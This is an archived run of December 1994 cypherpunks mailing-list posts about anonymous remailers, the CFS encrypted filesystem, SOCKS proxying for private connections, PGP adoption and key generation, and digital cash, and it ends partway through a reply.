Date: Tue, 20 Dec 94 21:10:59 PST
Subject: Guerrilla remailers revisited
In-Reply-To: <1NpzkKjqR4IK075yn@skypoint.com>
Message-ID: <199412210509.VAA03004@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

skaplin at skypoint.com (Samuel Kaplin) writes:

>As we have found out, the freenets use an interface called "FREEPORT." To
>myself and many others this software is a mystery. I am wondering if it is
>possible to call procmail via a .forward file under Freeport. If this is
>possible, why couldn't someone write a .procmailrc file to sanitize the
>headers. If this was written properly, all you should have to do is drop
>procmail, the .procmailrc file and the .forward file in place and the
>remailer is up and running.

I tried out a freenet system once. You could not create files with arbitrary contents. There was a facility for setting up mail forwarding, but it was all done via a menu-driven system where you specified the email address to which your mail should be forwarded. The system really did not seem to have enough flexibility for procmail.
Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLve4WRnMLJtOy9MBAQH7KwIAw0ttRN3/AJRtIhAnPrt88XF6qtlx5kBR
iORzonUhCe4tvSpLaOv6AREUiVJLkerFn3KWUHgXZ+IVAS9LSPUy8g==
=NCgJ
-----END PGP SIGNATURE-----

From hacsc218 at huey.csun.edu Tue Dec 20 21:34:32 1994
From: hacsc218 at huey.csun.edu (hacsc218 at huey.csun.edu)
Date: Tue, 20 Dec 94 21:34:32 PST
Subject: Intel to recall Pentiums
Message-ID:

Silicon Valley, CA- Intel Corporation announced today their plans to exchange up to several million defective Pentium microprocessors. The chips, widely used in personal computers, have a flaw which causes them to make calculating errors. Although the problem affects only certain types of applications, Pentium owners have demanded a recall.

Asked what the company intended to do with the returned chips, a high-ranking Intel official, speaking on condition of anonymity, would say only, "let's just say we found a good home for them."

On an unrelated note, the National Security Agency today announced plans for a major expansion of their Fort Meade headquarters...

Mike

From jpp at markv.com Tue Dec 20 22:19:25 1994
From: jpp at markv.com (jpp at markv.com)
Date: Tue, 20 Dec 94 22:19:25 PST
Subject: International Sports Book
Message-ID: <9412202216.aa26294@hermix.markv.com>

"Bag Your Bookie..." begins the ad for "the world's largest legalized International Sports Book". With the optional ATM card, you can access your winnings within 48 hours of the event, at any ATM.

Another example of the strength of "speed bumps" on the internet. Can the Internet Casino be far behind?

Does anyone want to pitch digital cash to these folks? Does anyone want to make some bucks setting these folks up on the net? (How big do you think the market is for an internet sports book?)

For further information you can "Enroll right now! Call 1-809-462-2279 and talk to one of our sports agents..." 24/7 I assume.

j'

P.S.
It would cost me (US dollars) 1.41(connect charge) + 2.50(calling card) for the first minute, and 0.97 for each additional minute for me to call these folks (located in Saint John's Antillees (sp!?)) from here in Encino, California at 1940 monday via the MCI network.

From jburrell at crl.com Tue Dec 20 23:25:03 1994
From: jburrell at crl.com (Jason Burrell)
Date: Tue, 20 Dec 94 23:25:03 PST
Subject: Cryptographic filesystem for Linux?
Message-ID: <199412210728.CAA14366@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Is there an encrypted filesystem for Linux out there? I'm speaking of something like Secure File System(DOS), but for Linux. The kernel in question is 1.1.59, soon to be upgraded to a later version. IDE drive, ex2fs formatted file system.

Regards.

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLvfY9SoZzwIn1bdtAQHZFAGA3n8SRWBHKm74hkZjm1hFuZ1EFzcXiD78
lRYe4j/RHaxORSM3tHjC/lrt3v9xTF8a
=KAWT
-----END PGP SIGNATURE-----

From strick at versant.com Wed Dec 21 00:07:57 1994
From: strick at versant.com (strick -- henry strickland)
Date: Wed, 21 Dec 94 00:07:57 PST
Subject: Cryptographic filesystem for Linux?
In-Reply-To: <199412210728.CAA14366@bb.hks.net>
Message-ID: <199412210807.AAA05754@gwarn.versant.com>

-----BEGIN PGP SIGNED MESSAGE-----

THUS SPAKE Jason Burrell :
# -----BEGIN PGP PSEUDO-SIGNED MESSAGE-----
#
# Is there an encrypted filesystem for Linux out there? I'm speaking of
# something like Secure File System(DOS), but for Linux. The kernel in
# question is 1.1.59, soon to be upgraded to a later version. IDE drive,
# ex2fs formatted file system.

I've thought about porting Matt Blaze's "cfs" to linux.
For several reasons:

-- because I trust his practical crypto ability more than mine or most anyone else's
-- because it runs in user-level code rather than in the kernel -- making both installation and development much easier
-- because it's had some serious usage and refinement

Q: What is it in the "cfs" code that makes it BSD-specific? How much work would it be to overcome that?

thx, strick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLvfhzwq3IMgMJUNlAQFXdwH/ZNmZx+sK14Qv/ZxHMbGPXDYbxmex0Dz6
X0RB3yuidJlgKUo0OjP1oWtncDDNBa8kwt6Agt9IHQ6sMHepZkmz9A==
=SBNL
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Wed Dec 21 00:41:36 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Wed, 21 Dec 94 00:41:36 PST
Subject: Remailer list needed
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Does anyone have a current listing of all the remailers? If so could you please send it to me as I would like to put it up on the auto-responder.

Thanks,

Sam

==============================================================================
We love your adherence to democratic principles.
- George Bush speaking to Ferdinand Marcos, June 1981
==============================================================================
skaplin at skypoint.com | "...vidi vici veni" - Overheard
| outside a Roman brothel.
PGP encrypted mail is accepted and |
preferred. |
| Change is the only constant in the
| Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender

iQEVAwUBLvfooMlnXxBRSgfNAQGLlQf/TzjZCzrZhMYWgs7XqGeV9+35XXmrjy+f
jqVseykiY3n3iEVDALIJobRCPATS962N1k2EinVHea0dKt+F6NA4xsrGStFdoneT
bVeoPwSgXGqghVyy88gRwiSHHFincIztHnV4A/r59B/Nz/4hawmYD0vo9SZeHhrv
ruBhWSJH6Cw/4Xh+17PgreLfpLCILFF0EFmXiiXrZ5dSsQZJ2aOD5LqN0TTbdxyN
uakm0WPao1WTCx2yT+SiLLex55lTzHrgfvP/gINwDbUA1TUl64OEYGsjxyl7gHWw
mCQrLFX0XxvAunB223aTBYNiGDyhy9P8BCN3yf95yYkxoCzq4pre6w==
=YR7W
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Wed Dec 21 00:41:59 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Wed, 21 Dec 94 00:41:59 PST
Subject: Why I do what I do.
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I had a very telling conversation with my wife today. I was working on some procmail stuff while she thought I should be doing something else. After about a ten minute diatribe, she said "I don't know why you spend all that time messing around with that crypto stuff. What point does it have?" I responded, "Do you remember when you were a little girl, and you told your best friend a secret?" She replied with a testy "YES." "All I'm trying to do is make sure our children will be able to do the same, because with all the developments lately this may not be possible." After about ten minutes of silence, I got a very soft "I understand."

The reason I have brought this conversation up is to make a point. You can have the best technology around, but if people can't relate to the general concepts involved as it relates to them, the war is lost.

Sam

==============================================================================
Television is the first truly democratic culture - the first culture available to everybody and entirely governed by what the people want. The most terrifying thing is what people do want.
- Clive Barnes, in "New York Times", 1969
==============================================================================
skaplin at skypoint.com | "...vidi vici veni" - Overheard
| outside a Roman brothel.
PGP encrypted mail is accepted and |
preferred. |
| Change is the only constant in the
| Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender

iQEVAwUBLvfouslnXxBRSgfNAQGMOgf9Er7usAgpi1H9PgTDQ6Sp6wvy3F9KL5Ly
8SxYO8wkIybIWcLTjuvC18MUQNe9dUTpLqSmjOsZqxIFvlkLna0HEwyO5d53Vta6
1yhLByTWoEiBuP2xfnSDWG19/uEivOGyZdlTjtJ0w6aquDlGepkGuWUFGEuhY0ee
+45NjzSoCluQhn5elzA79bNvp4OkQMnbCdzk6ZXD6uO1w0iGXyEKRd8V9TXig5Ir
2QXbZDqayW2B6TJP7m+kyPgdJAOxJia3LLZe0icBW7Et9jdys0lolAIGfHHe9LLL
dRMQnstSfxcvzDrhxEmZze/Jj9uP2S6WY3fKANO9IwwAugxrp92R8Q==
=Iyk6
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Wed Dec 21 00:43:00 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Wed, 21 Dec 94 00:43:00 PST
Subject: CFS for Linux
Message-ID: <199412210848.DAA15018@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

FYI:

Forwarded message:
> To: cypherpunks at toad.com
> Subject: New version (1.2) of CFS now available
> Date: Fri, 02 Dec 94 18:05:00 -0500
> From: Matt Blaze
>
> Source code for the latest version of CFS (release 1.2), the Cryptographic
> File System, is now available upon request for research and experimental
> use in the US and Canada.
[...]
> The software was developed under
> SunOS and BSDI, and there are also unsupported user-contributed ports
> available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix. We really
> can't promise to provide any technical support at all, beyond the
> source code itself.
> We also maintain a mailing list for CFS users and
> developers; subscription information is included with the source code.
[...]
> * Copyright (c) 1992, 1993, 1994 by AT&T.
> * Permission to use, copy, and modify this software without fee
> * is hereby granted, provided that this entire notice is included in
> * all copies of any software which is or includes a copy or
> * modification of this software and in all copies of the supporting
> * documentation for such software.
> *
> * This software is subject to United States export controls. You may
> * not export it, in whole or in part, or cause or allow such export,
> * through act or omission, without prior authorization from the United
> * States government and written permission from AT&T. In particular,
> * you may not make any part of this software available for general or
> * unrestricted distribution to others, nor may you disclose this software
> * to persons other than citizens and permanent residents of the United
> * States and Canada.
> *
> * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
> * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
> * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
> * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
>
> If you would like a copy of the CFS source code, please send email to:
>
> cfs at research.att.com
>
> DO NOT REPLY DIRECTLY TO THE SENDER OF MESSAGE. You must include a
> statement that you are in the US or Canada, are a citizen or legal
> permanent resident of the US or Canada, and have read and understand
> the license conditions stated above. Also include an email address in
> a US or Canada-registered domain. The code will be sent to you via
> email in a uuencoded compressed tarfile.

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLvfrsSoZzwIn1bdtAQHvcwGAn9qkYDbPDazGCM9Pg/8CDyTAgxm10Nj2
LB/Ek/NnzOTG8ywki0CEbF8B9ei2pxWH
=bPdS
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Wed Dec 21 02:08:01 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Wed, 21 Dec 94 02:08:01 PST
Subject: Remailer list needed
Message-ID: <199412211013.FAA15701@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

> Does anyone have a current listing of all the remailers? If so could you
> please send it to me as I would like to put it up on the auto-responder.

This seems to be the most popular question on c'punks lately. Raph posts his
list periodically (weekly ?), but perhaps he should move it to every other
day or daily. I think it would be worth posting more frequently here.
I never tire of answering this one, though.... :)

Anyway, the standard ways of accessing the latest list are:
    finger remailer-list at kiwi.cs.berkeley.edu
    http://www.cs.berkeley.edu/~raph/remailer-list.html

I don't know of a way to get it automatically via mail. Since, short of Web
access, Internet mail access is a necessary condition for using a remailer,
I've been meaning to hack something together for Raph to handle this
lowest-common-denominator means of access. So I think it would be great to
see you set it up for autoreply, Sam, if you can hook it in to the source
for regular updates.

The list (from finger) as of just after I typed this follows:

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"jpunix"} = " cpunk pgp hash latent cut post ek";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";
$remailer{"q"} = " cpunk hash latent cut ek";
catalyst at netcom.com is _not_ a remailer.

Last ping: Wed 21 Dec 94 2:00:01 PST
remailer email address                       history       latency  uptime
- - -----------------------------------------------------------------------
usura    usura at replay.com                 **++*+*****#     6:59  99.99%
alumni   hal at alumni.caltech.edu           *****+*****#     4:05  99.99%
nately   remailer at nately.ucsd.edu         ++++.+++++++  1:08:49  99.99%
penet    anon at anon.penet.fi               ***+*+******    32:46  99.99%
portal   hfinney at shell.portal.com         ***********#     2:13  99.99%
c2       remail at c2.org                    +-+++++-++ +    39:26  99.99%
ideath   remailer at ideath.goldenbear.com   *++**+******     9:35  99.98%
bsu-cs   nowhere at bsu-cs.bsu.edu           *++********#     4:43  99.97%
mix      mixmaster at nately.ucsd.edu        +++*.++++++-  1:17:13  99.97%
vox      remail at vox.xs4all.nl             ..-----...-+ 15:20:51  99.99%
q        q at c2.org                         *-+--++-      3:46:16  99.88%
rahul    homer at rahul.net                  **** ****--#    27:49  99.67%
soda     remailer at csua.berkeley.edu       ..........    9:50:58  99.61%
desert   remail at desert.xs4all.nl          -------.-.   16:26:44  99.99%
xs4all   remailer at xs4all.nl               **+ +**** #      7:14  99.41%
flame    tomaz at flame.sinet.org            *+-++**+* +*     8:51  98.09%
jpunix   remailer at jpunix.com              +-++**+* +#      8:25  97.96%
rebma    remailer at rebma.mn.org            --___..-.--+ 21:50:14  90.15%
extropia remail at extropia.wimsey.com       -+            5:00:06  17.69%

-L. Futplex McCarthy; PGP key by finger or server

"The objective is for us to get those conversations whether they're by an
alligator clip or ones and zeroes. Wherever they are, whatever they are, I
need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLvf9+Gf7YYibNzjpAQF+FwQAiqHC78uctkIG5vX+YF+H/EN8RodOLt6s
EZjJW3BGbFitC20++3MfPJ2wUVFXLcNxUpXY1gEcbxMttNPaMayK4VrKNWFzZ7BT
p1iKeb82Im+GYyL0EHvhtS8eDiyuPAyBSibQYjPppY/wfl5qW70FpxJ6hWc/4Avf
twIJ5XYXFcU=
=MO7e
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLvf/oSoZzwIn1bdtAQE+jwF/RcW6oTb23KEqrgDUfVeB0p6KMPGaL6hF
5/I3/BqjqvAY0FrsHkdPTTvI9LDNjyOc
=YjJG
-----END PGP SIGNATURE-----

From perry at imsi.com Wed Dec 21 07:11:38 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Wed, 21 Dec 94 07:11:38 PST
Subject: Cryptographic filesystem for Linux?
In-Reply-To: <199412210728.CAA14366@bb.hks.net>
Message-ID: <9412211510.AA11964@snark.imsi.com>

Jason Burrell says:
> Is there an encrypted filesystem for Linux out there? I'm speaking of
> something like Secure File System(DOS), but for Linux. The kernel in
> question is 1.1.59, soon to be upgraded to a later version. IDE drive,
> ex2fs formatted file system.

Matt Blaze's CFS should port to any system where NFS works...
.pm From hfinney at shell.portal.com Wed Dec 21 08:10:40 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 21 Dec 94 08:10:40 PST Subject: No privacy with DigiCash In-Reply-To: <199412210316.WAA00684@orchard.medford.ma.us> Message-ID: <199412211609.IAA11143@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Bill Sommerfeld writes, quoting me: >> Is there something I am overlooking, some way to buy things >> privately with DigiCash? >Yes... at least one TCP/IP proxy system (socks) lets the client >receive incoming connections (the client makes a second connection to >the socks server, and the socks server informs it of the addr/port >that it's listening on; when a connection comes in to that port, the >two incoming connections are gatewayed to each other); that's how >socksified FTP works, by the way. I read about socks last night, and while it has some nice features I don't know if it is suitable for a process which you want to have persist and be able to accept connections on an ongoing basis. With socks, the ecash process would tell the socks server to open a listening socket on its behalf. Then when a connection comes in from a merchant, it gets forwarded to the ecash process. This is the problem: the socks server probably cannot generally get the same port number as the ecash process. I don't know if it even tries. So you have to note the port number. Well, you have to do this already because the ecash process may not get the port number it wants if somebody else already has it. But, with socks you only get one incoming connection and then the socks server closes. The ecash process would have to request another listening socket each time it got a connection. And each of those could have a different port number. So this would be a constantly changing bit of information that you would have to keep in mind. 
If the ecash process were integrated with the web client, this would not be so bad, as the new port number could be supplied to the merchant server automatically. But with the current implementation this would have to be done manually. I was thinking of a socks-like model where you could have persistent servers running behind a socks firewall. The socks implementation is really designed for ftp transfers, where the ftp server has to make a connection back to the ftp client, and these are pretty transient. For a persistent server you would need a more complex structure. Probably there should be a persistent connection between your process and the socks server, separate from a listening socket that your process sets up. When a new connection comes in to the socks server for your machine, it does a connection of its own to your listening socket. Then there could be multiple connections to your server active at one time. The persistent connection would just be a "lifeline" so that if your server exited then the socks server would know to close down the proxy socket it holds for you. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvhTBRnMLJtOy9MBAQHSCAH8DEC7mPaFDNSRQ6bV5TMs75pRrYd6M7x5 4xlVpVq/K3jKm76wAhJVZou6Vx6lGCHwwwYb3kU0CeE33SkPyzHJrA== =ILoI -----END PGP SIGNATURE----- From hfinney at shell.portal.com Wed Dec 21 08:28:16 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 21 Dec 94 08:28:16 PST Subject: c'punks top 5 In-Reply-To: <9412202053.AA10926@snark.imsi.com> Message-ID: <199412211627.IAA12525@jobe.shell.portal.com> "Perry E. Metzger" writes: >I'd say run socks or something similar; its a generalized port >proxying facility for firewalls, but it should work fine for this. I was reading about socks last night, and it does seem to be very close to what is needed for this. In fact, if you sat down to write a TCP connection redirector protocol for anonymous connections, socks is pretty close to what you would come up with. 
Socks V5 even has some encryption specified for it, although it has the
deficiency that the "forwarding" connection address is sent in the clear.

The basic idea of socks is very simple. A socks server runs on port 1080
on a gateway machine. If you want to make a connection through the server,
connect to it on port 1080, then send a 1-byte version number, 4, a 1-byte
request code, 1, the 2-byte port number you want to connect to, the 4-byte
IP address you want to connect to, and then a null-terminated string which
is supposed to be your user name (to help the server decide whether to
allow the connection). It returns an 8-byte response message: 1 byte of
version number, 4, 1 byte of result, where 0x5a means success, 2 bytes of
outgoing port number and 4 bytes of server IP address. From then on,
assuming success, it just forwards messages and you can talk directly to
the remote machine.

This lends itself nicely to chaining; simply make a socks request to the
first machine, requesting it to connect to another socks machine; then send
another socks request which will be interpreted by the 2nd machine, etc.
You could build up chains of any size in this way, even responding
dynamically to failed or refused connections.

In fact, as with the CERN httpd proxy server, where existing
implementations might actually be useful already for laundering web
connections, it is possible that some socks implementations could be used
as well. If the socks server did not check that requests came from the
local site (as the httpd proxy server sometimes does not), then you could
set your client to make socks connections to such a server and get
anonymous web connections already.

This also would mean that it might be politically easier to run a socks
server than to run an anarchistic http redirector. Socks is pretty well
understood by security-conscious network people so might appear to be less
of a threat.
Plus, if it does turn out that existing socks servers are useful for this purpose then this is something we could start using right away. Does anybody know of any sites running socks servers? I would like to experiment with whether they would accept connections and requests from remote sites. Thanks - Hal P.S. I found information about socks by searching the Internet Drafts archive at ISI. This California server is a mirror of the main one in Virginia, but is http based so is faster. Use URL http://info.internet.isi.edu/in-drafts, select "Locate internet drafts by file name", and then do a keyword search for socks. There are 3 of them, V4, V5, and one about using pem for encryption. From duncan at hasp.com Wed Dec 21 09:05:03 1994 From: duncan at hasp.com (Duncan J Watson) Date: Wed, 21 Dec 94 09:05:03 PST Subject: Remailer list supplied In-Reply-To: <199412211013.FAA15701@bb.hks.net> Message-ID: As per your request I just set up a mail robot that provides the remailer-list via email. It is slaved to the finger list at berkeley and gets updated from it once daily. To try it send email to remailer-list at remailer.hasp.com If mail to remailer.hasp.com bounces try speedbumps.hasp.com my changes to DNS may not have propagated out to the world yet. If you reference this server please use the address remailer-list at remailer.hasp.com since speedbumps.hasp.com may not always be the host supplying this service. If you have any questions or comments about this service just email me a message. djw On Wed, 21 Dec 1994, L. McCarthy wrote: > > I don't know of a way to get it automatically via mail. Since, short of Web > access, Internet mail access is a necessary condition for using a remailer, > I've been meaning to hack something together for Raph to handle this lowest- > common-denominator means of access. So I think it would be great to see you > set it up for autoreply, Sam, if you can hook it in to the source for regular > updates. 
>
------------------------------
Duncan J Watson                    Email: Duncan at HASP.COM
Technical Support/Development      ph#: +1 212 564 5678
Aladdin Software Security, Inc.    fax#:+1 212 564 3377

From bass at fc.net Wed Dec 21 09:26:16 1994
From: bass at fc.net (Bass Wastelan)
Date: Wed, 21 Dec 94 09:26:16 PST
Subject: anon-HTTP server w/o root access
In-Reply-To: <199412210047.TAA10557@bb.hks.net>
Message-ID: <199412211728.LAA01434@freeside.fc.net>

> someone writes:
> $ an anon-http proxy server would probably consume much more in
> $ the way of network resources than a remailer, which will
> $ likely lead to many being shutdown once discovered by the sysadmins
>
> That might be somewhat less true on a commercial provider than on an
> educational or corporate provider, but in any case a WWW anon-server would be
> seen as a much larger potential security hole than a remailer. A couple of
> months ago a "friendly" outsider gained unauthorized access to user files
> here via our Web server, and reported it to the sysadmins. I would have been
> mighty nervous if I'd been offering anon WWW access to the world.

I'd be happy to set up a machine at my provider's site to run a test of
anonymized httpd. From what I understand they wouldn't mind helping either.

Within the next 6 months, there probably will be a number of for-pay
anonymizer services available on the net. It just makes too much sense for
it to not happen.

From tedwards at src.umd.edu Wed Dec 21 09:46:30 1994
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Wed, 21 Dec 94 09:46:30 PST
Subject: GUI: PGP vs novices
In-Reply-To:
Message-ID:

On Wed, 21 Dec 1994, Dave Horsfall wrote:

> On Tue, 20 Dec 1994, Dave Del Torto relayed to us:
> Egad.
> I suppose I shouldn't feel too annoyed that out of over fifty
> copies of PGP (from the 2.3A days) I've distributed (at my own expense)
> to radio amateurs in Australia (for authentication on packet radio),
> with two lectures and an article in a national magazine, and
> exhortations to call me about any problems, precisely two other people
> are using it (but are not signing their messages); and these were
> already crypto-aware to start with - sigh...

PGP has made me more crypto aware, but at this point neither I nor most of
the crypto aware people I personally know feel there is a need to either
encrypt or sign messages on a regular basis.

While this doesn't do great things for supporting crypto, it is simply
reality.

DigiCash is a different situation of course - it is needed, and as soon as
possible.

-Thomas

From eric at remailer.net Wed Dec 21 10:21:01 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 21 Dec 94 10:21:01 PST
Subject: properties of FV
In-Reply-To:
Message-ID: <199412211917.LAA17106@largo.remailer.net>

   From: Nathaniel Borenstein

   The work involved in adding optional cryptography is much more than
   you might think, particularly because of our internal security
   architecture. Basically, without going into a lot of details, the FV
   crypto-engine would have to live on the non-Internet machines that are
   not in our direct control, and this would enormously complicate the
   limited (batch!) communication we facilitate between the Internet and
   non-Internet machines.

The perceived need for crypto "below the line" comes from the viewpoint
that the system needs to be completely secure because crypto failures must
be prevented at all cost. Rubbish. The subsequent claim that you couldn't
possibly put crypto on the Unix boxes which are in your control is
therefore also bogus.

Let's assume that FV were to have a customer agreement that did not contain
an implied warranty of identity for a digital signature. Therefore if the
crypto gets hacked it's just as if the email system gets hacked. Therefore
keeping public keys (we're not talking about FV actually signing anything)
above the line on a Unix box is no different than trusting the mailer on
that same Unix box.

I really don't believe FV would have to put crypto on EDS equipment.

   The crypto option is one we're very interested in adding eventually,
   but at this point it would be a major strain on our resources.

I think you are far overestimating what it would take.

   Moreover, frankly, if we did it, that would only serve to mix our
   message in many peoples' perception. It's hard enough explaining to
   reporters that "we've discovered that crypto isn't needed for
   commerce." Their chance of understanding our message would NOT be
   enhanced if we then added "but we're providing crypto as an option
   anyway."

The message that it's "not necessary for commerce" is reactionary to the
assertion that it is necessary. By positioning FV in an adversarial role
with respect to cryptography, you'll have the same problem no matter when
you introduce crypto. I personally think you'll have a harder time changing
your position later, after more people have been exposed to FV's current
position.

A much better public position is that "you can do commerce with or without
crypto", which asserts independence rather than negation. These two public
positions are _not_ identical; they are similar, but don't be fooled by
some positivist notion of denotation into thinking that they're the same.

Eric

From bshantz at spry.com Wed Dec 21 10:37:18 1994
From: bshantz at spry.com (bshantz at spry.com)
Date: Wed, 21 Dec 94 10:37:18 PST
Subject: GUI: PGP vs novices
Message-ID: <199412211837.KAA09590@homer.spry.com>

Thomas Grant Edwards Writes:

>PGP has made me more crypto aware, but at this point neither I nor most of
>the crypto aware people I personally know feel there is a need to either
>encrypt or sign messages on a regular basis.
It is my own personal opinion that in order for crypto to truly become
mainframe, the software manufacturers of internet connectivity packages must
integrate crypto into the applications. Look at the past threads here on
Cypherpunks..."How do I write a script to put PGP into ELM?" "PGP DLL
modularity" etc.

In order to bring crypto to the masses, we have got to convince people that
it is necessary. We also must make it "second nature". It sure is nice to
have a menu option or a toolbar button that will encrypt plaintext
automatically. Key management and some of the "high tech" (I know, for us
it's nothing, but for my dad who just bought a computer and doesn't
understand the difference between click, double click, and drag, crypto is a
really high tech thing just in itself.) things of crypto should not be
directly handled by the user. (Optional of course. On a privacy level, the
user should have full control. But give the user a break...if the software
is secure..as such...so is the user's privacy.)

You will notice that this message is not signed. That's because in order to
sign it, I would need to save my message, hop out to a DOS box, PGP encrypt
it, hop back to my mail program and insert the encrypted mail as a text file.
That's enough to discourage the average user. This is pretty much what Tim
May was talking about when he discussed why he doesn't sign his messages.
It's not that he couldn't... it's just not practical for him. It's not really
practical for me either, but I do it when I feel it's necessary.

The only way to make crypto practical is to basically hide the technical
side from the user and make it easy.

That's my two cents.

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                        bshantz at spry.com
Senior Software Engineer           SPRY Inc.
Direct #: (206)-442-8251           316 Occidental Ave. S.
Main #: (206)-447-0300             Suite 316
Fax #: (206)-447-9008              Seattle, WA 98104
WWW URL: http://WWW.SPRY.COM
----------------------------------------------------------------------
PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

From rsalz at osf.org Wed Dec 21 10:37:37 1994
From: rsalz at osf.org (Rich Salz)
Date: Wed, 21 Dec 94 10:37:37 PST
Subject: c'punks top 5
Message-ID: <9412211832.AA08198@sulphur.osf.org>

> I was reading about socks last night, and it does seem to be very close
> to what is needed for this.

Somebody, I forget who, had a hospitality suite at a Usenix LISA
conference. They have a commercial version of socks. I don't remember if it
was bundled or an option. At any rate, kinda neat that someone is providing
privacy tools rather than the other way round.
	/r$

From Tony.Gurnick at nzdairy.co.nz Wed Dec 21 10:49:33 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Wed, 21 Dec 94 10:49:33 PST
Subject: Have 2.6.2 but cant gen 2048 bits
Message-ID: <94122207473479@nzdairy.co.nz>

All,
Following is the output from pgp2.6.2 and me trying to generate
2048 bit keys. What am I doing wrong?

;pgp -kg
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1994/12/22 07:47 GMT
Pick your RSA key size:
    1)  512 bits- Low commercial grade, fast but less secure
    2)  768 bits- High commercial grade, medium speed, good security
    3) 1024 bits- "Military" grade, slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 2048
Generating an RSA key with a 1024-bit modulus.

You need a user ID for your public key. The desired form for this
user ID is your name, followed by your E-mail address enclosed in
, if you have an E-mail address.
For example: John Q. Smith <12345.6789 at compuserve.com>
Enter a user ID for your public key:

Thanks

T

From Tony.Gurnick at nzdairy.co.nz Wed Dec 21 11:42:33 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Wed, 21 Dec 94 11:42:33 PST
Subject: Kiwi cypherpunks
Message-ID: <94122208374730@nzdairy.co.nz>

Lads (and lasses),
I seem to be having a bit of troub communicating
with the kiwis on this list directly, but no probs if I send to the
list. Has there been any communication on this topic in the last
3 or so days??? We can't organise anything if we can't talk to each
other!

T

From warlord at MIT.EDU Wed Dec 21 11:50:36 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Wed, 21 Dec 94 11:50:36 PST
Subject: Have 2.6.2 but cant gen 2048 bits
In-Reply-To: <94122207473479@nzdairy.co.nz>
Message-ID: <9412211950.AA28753@toxicwaste.media.mit.edu>

> Following is the output from pgp2.6.2 and me trying to generate
> 2048 bit keys. What am I doing wrong?

[stuff deleted]

> Current time: 1994/12/22 07:47 GMT

